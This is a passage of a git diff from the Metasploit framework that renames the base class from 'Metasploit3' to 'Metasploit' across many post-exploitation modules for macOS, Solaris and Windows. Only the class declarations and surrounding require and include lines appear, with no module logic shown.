Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/general/execute.rb b/modules/post/multi/general/execute.rb index 0318bda57e..a0531f8359 100644 --- a/modules/post/multi/general/execute.rb +++ b/modules/post/multi/general/execute.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/general/wall.rb b/modules/post/multi/general/wall.rb index 563ccfe3c3..cc6165ff81 100644 --- a/modules/post/multi/general/wall.rb +++ b/modules/post/multi/general/wall.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info = {}) super( update_info( diff --git a/modules/post/multi/manage/dbvis_add_db_admin.rb b/modules/post/multi/manage/dbvis_add_db_admin.rb index eb8d5f1956..6596146392 100644 --- a/modules/post/multi/manage/dbvis_add_db_admin.rb +++ b/modules/post/multi/manage/dbvis_add_db_admin.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/manage/dbvis_query.rb b/modules/post/multi/manage/dbvis_query.rb index ebc9518926..3300842d30 100644 --- a/modules/post/multi/manage/dbvis_query.rb +++ b/modules/post/multi/manage/dbvis_query.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/manage/multi_post.rb b/modules/post/multi/manage/multi_post.rb index fd93ae6132..9236b873af 100644 --- a/modules/post/multi/manage/multi_post.rb +++ b/modules/post/multi/manage/multi_post.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/manage/play_youtube.rb b/modules/post/multi/manage/play_youtube.rb index b4b18d615c..d772888fcf 100644 --- a/modules/post/multi/manage/play_youtube.rb +++ b/modules/post/multi/manage/play_youtube.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/manage/record_mic.rb b/modules/post/multi/manage/record_mic.rb index bce65e61da..a2c14046f3 100644 --- a/modules/post/multi/manage/record_mic.rb +++ b/modules/post/multi/manage/record_mic.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/multi/manage/set_wallpaper.rb b/modules/post/multi/manage/set_wallpaper.rb index c02a0278dc..e940b0c416 100644 --- a/modules/post/multi/manage/set_wallpaper.rb +++ b/modules/post/multi/manage/set_wallpaper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb index bcc5a44ed6..935c9593d8 100644 --- a/modules/post/multi/manage/shell_to_meterpreter.rb +++ b/modules/post/multi/manage/shell_to_meterpreter.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/powershell' require 'msf/core/post/windows/powershell' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Exploit::Powershell include Post::Windows::Powershell diff --git a/modules/post/multi/manage/sudo.rb b/modules/post/multi/manage/sudo.rb index afa83fcea1..331a82653d 100644 --- a/modules/post/multi/manage/sudo.rb +++ b/modules/post/multi/manage/sudo.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb index 7042d04d9f..9c7bfa2aa4 100644 --- a/modules/post/multi/manage/system_session.rb +++ b/modules/post/multi/manage/system_session.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/recon/local_exploit_suggester.rb b/modules/post/multi/recon/local_exploit_suggester.rb index 823c8b71e4..4319b3d6d3 100644 --- a/modules/post/multi/recon/local_exploit_suggester.rb +++ b/modules/post/multi/recon/local_exploit_suggester.rb @@ -7,7 +7,7 @@ require 'msf/core' include Msf::Auxiliary::Report -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/osx/admin/say.rb b/modules/post/osx/admin/say.rb index 2d11de9201..2ff7edc2da 100644 --- a/modules/post/osx/admin/say.rb +++ b/modules/post/osx/admin/say.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/osx/capture/keylog_recorder.rb b/modules/post/osx/capture/keylog_recorder.rb index 2f7e3c1710..33eb637fdf 100644 --- a/modules/post/osx/capture/keylog_recorder.rb +++ b/modules/post/osx/capture/keylog_recorder.rb @@ -5,7 +5,7 @@ require 'shellwords' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/capture/screen.rb b/modules/post/osx/capture/screen.rb index 02ce7c8cdf..26d6601c65 100644 --- a/modules/post/osx/capture/screen.rb +++ b/modules/post/osx/capture/screen.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/gather/autologin_password.rb b/modules/post/osx/gather/autologin_password.rb index 88546475f6..92da804bbe 100644 --- a/modules/post/osx/gather/autologin_password.rb +++ b/modules/post/osx/gather/autologin_password.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File # extract/verify by by XORing your kcpassword with your password diff --git a/modules/post/osx/gather/enum_adium.rb b/modules/post/osx/gather/enum_adium.rb index f6b668343a..b7f5648dab 100644 --- a/modules/post/osx/gather/enum_adium.rb +++ b/modules/post/osx/gather/enum_adium.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/gather/enum_airport.rb b/modules/post/osx/gather/enum_airport.rb index 3a59f7ae1e..e5373d0a78 100644 --- a/modules/post/osx/gather/enum_airport.rb +++ b/modules/post/osx/gather/enum_airport.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/osx/gather/enum_chicken_vnc_profile.rb b/modules/post/osx/gather/enum_chicken_vnc_profile.rb index f572a2d64a..dc17dd6bf4 100644 --- a/modules/post/osx/gather/enum_chicken_vnc_profile.rb +++ b/modules/post/osx/gather/enum_chicken_vnc_profile.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File diff --git a/modules/post/osx/gather/enum_colloquy.rb b/modules/post/osx/gather/enum_colloquy.rb index 27197533b5..5eb8454835 100644 --- a/modules/post/osx/gather/enum_colloquy.rb +++ b/modules/post/osx/gather/enum_colloquy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File diff --git a/modules/post/osx/gather/enum_keychain.rb b/modules/post/osx/gather/enum_keychain.rb index a4fbe15cc5..de77d8cfca 100644 --- a/modules/post/osx/gather/enum_keychain.rb +++ b/modules/post/osx/gather/enum_keychain.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::OSX::System include Msf::Exploit::FileDropper diff --git a/modules/post/osx/gather/enum_osx.rb b/modules/post/osx/gather/enum_osx.rb index fa87e2c46c..6cd9c32960 100644 --- a/modules/post/osx/gather/enum_osx.rb +++ b/modules/post/osx/gather/enum_osx.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/gather/hashdump.rb b/modules/post/osx/gather/hashdump.rb index 4125e961ac..9f8a6432df 100644 --- a/modules/post/osx/gather/hashdump.rb +++ b/modules/post/osx/gather/hashdump.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/auxiliary/report' require 'rexml/document' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post # set of accounts to ignore while pilfering data OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"] diff --git a/modules/post/osx/gather/password_prompt_spoof.rb b/modules/post/osx/gather/password_prompt_spoof.rb index 1ba4c2be21..a20b040cc9 100644 --- a/modules/post/osx/gather/password_prompt_spoof.rb +++ b/modules/post/osx/gather/password_prompt_spoof.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/gather/safari_lastsession.rb b/modules/post/osx/gather/safari_lastsession.rb index 1763927d2d..0772a72847 100644 --- a/modules/post/osx/gather/safari_lastsession.rb +++ b/modules/post/osx/gather/safari_lastsession.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File diff --git a/modules/post/osx/manage/mount_share.rb b/modules/post/osx/manage/mount_share.rb index 4db60b33c1..3360b43c0f 100644 --- a/modules/post/osx/manage/mount_share.rb +++ b/modules/post/osx/manage/mount_share.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post # list of accepted file share protocols. other "special" URLs (like vnc://) will be ignored. FILE_SHARE_PROTOCOLS = %w(smb nfs cifs ftp afp) diff --git a/modules/post/osx/manage/record_mic.rb b/modules/post/osx/manage/record_mic.rb index 6cf17e92ed..387739a1e5 100644 --- a/modules/post/osx/manage/record_mic.rb +++ b/modules/post/osx/manage/record_mic.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'shellwords' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report include Msf::Post::OSX::RubyDL diff --git a/modules/post/osx/manage/vpn.rb b/modules/post/osx/manage/vpn.rb index cff9656d91..26b49c0d4e 100644 --- a/modules/post/osx/manage/vpn.rb +++ b/modules/post/osx/manage/vpn.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File diff --git a/modules/post/osx/manage/webcam.rb b/modules/post/osx/manage/webcam.rb index 973e2b24f7..8869b55597 100644 --- a/modules/post/osx/manage/webcam.rb +++ b/modules/post/osx/manage/webcam.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'shellwords' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report include Msf::Post::OSX::RubyDL diff --git a/modules/post/solaris/gather/checkvm.rb b/modules/post/solaris/gather/checkvm.rb index 6a8a049fbe..e51582b538 100644 --- a/modules/post/solaris/gather/checkvm.rb +++ b/modules/post/solaris/gather/checkvm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Solaris::Priv diff --git a/modules/post/solaris/gather/enum_packages.rb b/modules/post/solaris/gather/enum_packages.rb index 9f3895a9a2..0d4c4bb2ee 100644 --- a/modules/post/solaris/gather/enum_packages.rb +++ b/modules/post/solaris/gather/enum_packages.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Solaris::System diff --git a/modules/post/solaris/gather/enum_services.rb b/modules/post/solaris/gather/enum_services.rb index cdbd17dd57..eb561d7841 100644 --- a/modules/post/solaris/gather/enum_services.rb +++ b/modules/post/solaris/gather/enum_services.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Solaris::System diff --git a/modules/post/solaris/gather/hashdump.rb b/modules/post/solaris/gather/hashdump.rb index 85e30d43b8..846d9c0ac0 100644 --- a/modules/post/solaris/gather/hashdump.rb +++ b/modules/post/solaris/gather/hashdump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Solaris::Priv diff --git a/modules/post/windows/capture/keylog_recorder.rb b/modules/post/windows/capture/keylog_recorder.rb index 857ae41b71..a2a08093d9 100644 --- a/modules/post/windows/capture/keylog_recorder.rb +++ b/modules/post/windows/capture/keylog_recorder.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::File diff --git a/modules/post/windows/capture/lockout_keylogger.rb b/modules/post/windows/capture/lockout_keylogger.rb index ba6680db44..acc78b2fdb 100644 --- a/modules/post/windows/capture/lockout_keylogger.rb +++ b/modules/post/windows/capture/lockout_keylogger.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/escalate/droplnk.rb b/modules/post/windows/escalate/droplnk.rb index 66c0028d56..475527e9f0 100644 --- a/modules/post/windows/escalate/droplnk.rb +++ b/modules/post/windows/escalate/droplnk.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/escalate/getsystem.rb b/modules/post/windows/escalate/getsystem.rb index a155bb9166..78dec5c92e 100644 --- a/modules/post/windows/escalate/getsystem.rb +++ b/modules/post/windows/escalate/getsystem.rb @@ -8,7 +8,7 @@ require 'rex' require 'metasm' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/escalate/golden_ticket.rb b/modules/post/windows/escalate/golden_ticket.rb index 09abdec2b3..715334d9bb 100644 --- a/modules/post/windows/escalate/golden_ticket.rb +++ b/modules/post/windows/escalate/golden_ticket.rb @@ -3,7 +3,7 @@ require 'msf/core/post/windows/netapi' require 'msf/core/post/windows/kiwi' require 'msf/core/post/windows/error' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::NetAPI include Msf::Post::Windows::Accounts include Msf::Post::Windows::Kiwi diff --git a/modules/post/windows/escalate/ms10_073_kbdlayout.rb b/modules/post/windows/escalate/ms10_073_kbdlayout.rb index 928f36fccf..bf2931faaf 100644 --- a/modules/post/windows/escalate/ms10_073_kbdlayout.rb +++ b/modules/post/windows/escalate/ms10_073_kbdlayout.rb @@ -8,7 +8,7 @@ require 'rex' require 'metasm' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/escalate/screen_unlock.rb b/modules/post/windows/escalate/screen_unlock.rb index abb3304552..65752a411d 100644 --- a/modules/post/windows/escalate/screen_unlock.rb +++ b/modules/post/windows/escalate/screen_unlock.rb @@ -8,7 +8,7 @@ require 'rex' require 'metasm' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/gather/arp_scanner.rb b/modules/post/windows/gather/arp_scanner.rb index ba5abff56d..94bf92cb36 100644 --- a/modules/post/windows/gather/arp_scanner.rb +++ b/modules/post/windows/gather/arp_scanner.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/bitcoin_jacker.rb b/modules/post/windows/gather/bitcoin_jacker.rb index adfafd3529..03e1ec0f9a 100644 --- a/modules/post/windows/gather/bitcoin_jacker.rb +++ b/modules/post/windows/gather/bitcoin_jacker.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/bitlocker_fvek.rb b/modules/post/windows/gather/bitlocker_fvek.rb index 03406d82a0..ac65ddfead 100644 --- a/modules/post/windows/gather/bitlocker_fvek.rb +++ b/modules/post/windows/gather/bitlocker_fvek.rb @@ -1,6 +1,6 @@ require 'rex/parser/fs/bitlocker' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Error include Msf::Post::Windows::ExtAPI diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb index f5eebd432c..643ab32e41 100644 --- a/modules/post/windows/gather/cachedump.rb +++ b/modules/post/windows/gather/cachedump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/checkvm.rb b/modules/post/windows/gather/checkvm.rb index 51de3c6061..b321ee2c52 100644 --- a/modules/post/windows/gather/checkvm.rb +++ b/modules/post/windows/gather/checkvm.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/bulletproof_ftp.rb b/modules/post/windows/gather/credentials/bulletproof_ftp.rb index 20c23ca6c3..a0ca0b7bb6 100644 --- a/modules/post/windows/gather/credentials/bulletproof_ftp.rb +++ b/modules/post/windows/gather/credentials/bulletproof_ftp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report include Msf::Post::File diff --git a/modules/post/windows/gather/credentials/coreftp.rb b/modules/post/windows/gather/credentials/coreftp.rb index b2be541cdb..6fae685c70 100644 --- a/modules/post/windows/gather/credentials/coreftp.rb +++ b/modules/post/windows/gather/credentials/coreftp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/credential_collector.rb b/modules/post/windows/gather/credentials/credential_collector.rb index e58c2a2020..becd26f6a0 100644 --- a/modules/post/windows/gather/credentials/credential_collector.rb +++ b/modules/post/windows/gather/credentials/credential_collector.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb index a90b6d3ac1..21569dea6c 100644 --- a/modules/post/windows/gather/credentials/domain_hashdump.rb +++ b/modules/post/windows/gather/credentials/domain_hashdump.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/auxiliary/report' require 'metasploit/framework/ntds/parser' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/dyndns.rb b/modules/post/windows/gather/credentials/dyndns.rb index f1ce358a57..34189e1ff7 100644 --- a/modules/post/windows/gather/credentials/dyndns.rb +++ b/modules/post/windows/gather/credentials/dyndns.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/enum_cred_store.rb b/modules/post/windows/gather/credentials/enum_cred_store.rb index 3a745ee044..342dc73585 100644 --- a/modules/post/windows/gather/credentials/enum_cred_store.rb +++ b/modules/post/windows/gather/credentials/enum_cred_store.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/gather/credentials/enum_laps.rb b/modules/post/windows/gather/credentials/enum_laps.rb index 9a6f9595cc..492f11a19e 100644 --- a/modules/post/windows/gather/credentials/enum_laps.rb +++ b/modules/post/windows/gather/credentials/enum_laps.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb index 8d7e09e1f8..9246cb6f01 100644 --- a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb +++ b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/epo_sql.rb b/modules/post/windows/gather/credentials/epo_sql.rb index 7abf8eb39a..def32ecf0f 100644 --- a/modules/post/windows/gather/credentials/epo_sql.rb +++ b/modules/post/windows/gather/credentials/epo_sql.rb @@ -8,7 +8,7 @@ require 'rex' require 'net/dns/resolver' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index 4fd3ca037e..5d70866e37 100644 --- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/gather/credentials/flashfxp.rb b/modules/post/windows/gather/credentials/flashfxp.rb index efb320bb2d..622dec79c6 100644 --- a/modules/post/windows/gather/credentials/flashfxp.rb +++ b/modules/post/windows/gather/credentials/flashfxp.rb @@ -8,7 +8,7 @@ require 'rex' require 'rex/parser/ini' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/ftpnavigator.rb b/modules/post/windows/gather/credentials/ftpnavigator.rb index 55c98131a2..0476a2dfb8 100644 --- a/modules/post/windows/gather/credentials/ftpnavigator.rb +++ b/modules/post/windows/gather/credentials/ftpnavigator.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/ftpx.rb b/modules/post/windows/gather/credentials/ftpx.rb index 0423d9d277..ccfa27e692 100644 --- a/modules/post/windows/gather/credentials/ftpx.rb +++ b/modules/post/windows/gather/credentials/ftpx.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::UserProfiles def initialize(info={}) diff --git a/modules/post/windows/gather/credentials/gpp.rb b/modules/post/windows/gather/credentials/gpp.rb index ba0bacb968..edeb4f9473 100644 --- a/modules/post/windows/gather/credentials/gpp.rb +++ b/modules/post/windows/gather/credentials/gpp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' require 'rex/parser/group_policy_preferences' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/idm.rb b/modules/post/windows/gather/credentials/idm.rb index 6590172922..13bd95f034 100644 --- a/modules/post/windows/gather/credentials/idm.rb +++ b/modules/post/windows/gather/credentials/idm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/imail.rb b/modules/post/windows/gather/credentials/imail.rb index db8a566a30..f1a5358e0f 100644 --- a/modules/post/windows/gather/credentials/imail.rb +++ b/modules/post/windows/gather/credentials/imail.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/imvu.rb b/modules/post/windows/gather/credentials/imvu.rb index 239eb67dd2..8ba990f1ea 100644 --- a/modules/post/windows/gather/credentials/imvu.rb +++ b/modules/post/windows/gather/credentials/imvu.rb @@ -10,7 +10,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb b/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb index 87d870ebc4..4e309f6850 100644 --- a/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb +++ b/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/meebo.rb b/modules/post/windows/gather/credentials/meebo.rb index 44364a50e4..59a6bc4b4a 100644 --- a/modules/post/windows/gather/credentials/meebo.rb +++ b/modules/post/windows/gather/credentials/meebo.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/mremote.rb b/modules/post/windows/gather/credentials/mremote.rb index 6658d6c797..101255d945 100644 --- a/modules/post/windows/gather/credentials/mremote.rb +++ b/modules/post/windows/gather/credentials/mremote.rb @@ -9,7 +9,7 @@ require 'rex' require 'rexml/document' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/mssql_local_hashdump.rb b/modules/post/windows/gather/credentials/mssql_local_hashdump.rb index f1d00c5d0b..314b620f0e 100644 --- a/modules/post/windows/gather/credentials/mssql_local_hashdump.rb +++ b/modules/post/windows/gather/credentials/mssql_local_hashdump.rb @@ -9,7 +9,7 @@ require 'msf/core/auxiliary/report' require 'msf/core/post/windows/mssql' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::MSSQL diff --git a/modules/post/windows/gather/credentials/nimbuzz.rb b/modules/post/windows/gather/credentials/nimbuzz.rb index f42fa10637..1114540bb9 100644 --- a/modules/post/windows/gather/credentials/nimbuzz.rb +++ b/modules/post/windows/gather/credentials/nimbuzz.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/outlook.rb b/modules/post/windows/gather/credentials/outlook.rb index bca5db7416..b01bb07381 100644 --- a/modules/post/windows/gather/credentials/outlook.rb +++ b/modules/post/windows/gather/credentials/outlook.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/razer_synapse.rb b/modules/post/windows/gather/credentials/razer_synapse.rb index 9d5d445164..627579e05b 100644 --- a/modules/post/windows/gather/credentials/razer_synapse.rb +++ b/modules/post/windows/gather/credentials/razer_synapse.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'openssl' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::UserProfiles include Msf::Post::File diff --git a/modules/post/windows/gather/credentials/razorsql.rb b/modules/post/windows/gather/credentials/razorsql.rb index a01bb9b7b8..40fc956c13 100644 --- a/modules/post/windows/gather/credentials/razorsql.rb +++ b/modules/post/windows/gather/credentials/razorsql.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/auxiliary/report' require 'openssl' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git 